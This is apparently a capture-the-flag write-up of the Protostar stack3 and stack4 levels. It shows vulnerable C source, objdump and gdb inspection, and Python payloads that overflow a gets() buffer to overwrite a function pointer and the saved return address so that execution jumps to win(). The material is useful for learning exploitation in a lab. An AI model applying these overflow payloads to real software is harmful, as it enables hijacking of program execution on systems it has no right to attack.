Buffer Overflows can Redirect Program Execution - bin 0x0D

stack3

Stack3 looks at environment variables, and how they can be set, and overwriting function pointers stored on the stack (as a prelude to overwriting the saved EIP)

Hints: both gdb and objdump is your friend when you determine where the win() function lies in memory.

source code: 

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  volatile int (*fp)();
  char buffer[64];

  fp = 0;

  gets(buffer);

  if(fp) {
      printf("calling function pointer, jumping to 0x%08x\n", fp);
      fp();
  }
}

open in objdump:

$ objdump -x stack3 | less

we can get the address of win() function in the memory:

open in gdb:

 

use gdb to determine the address of win() function:

'x' for 'examine'

'p' for 'print'

pwned!:

$ python -c "print('A'*(4*16)+'\x24\x84\x04\x08')" | ./stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed

 stack4

Stack4 takes a look at overwriting saved EIP and standard buffer overflows.

Hints:

•     a variety of introductory papers into buffer overflows may help.
•     gdb lets you do “run < input”
•     EIP is not directly after the end of buffer, compiler padding can also increase the size.

source code:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}

open in objdump:

$ objdump -t /opt/protostar/bin/stack4 | grep win
080483f4 g     F .text	00000014              win

now we get the address of win() function in the memory

open in gdb:

try to input somethin to see what happen:

$ vim /tmp/exploit.py

exploit.py: 

padding="AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ"
print(padding)

write into a file:

$ python exploit.py > tmp
$ cat tmp
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ

 use the file as input in gdb:

$ python -c "print(chr(0x54))"
T

have a look at the stack

because the return pointer points to the address '0x54545454', we simply need to overwrite 'TTTT' with the address of win() function.

now we modify the exploit.py:

import struct
padding="AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRR"
ebp="AAAA"
# a better way to convert the integer number into a binay string
ret=struct.pack("I", 0x080483f4) 
print(padding+ebp+ret)

let's try it out:

$ python exploit.py > tmp

pwned!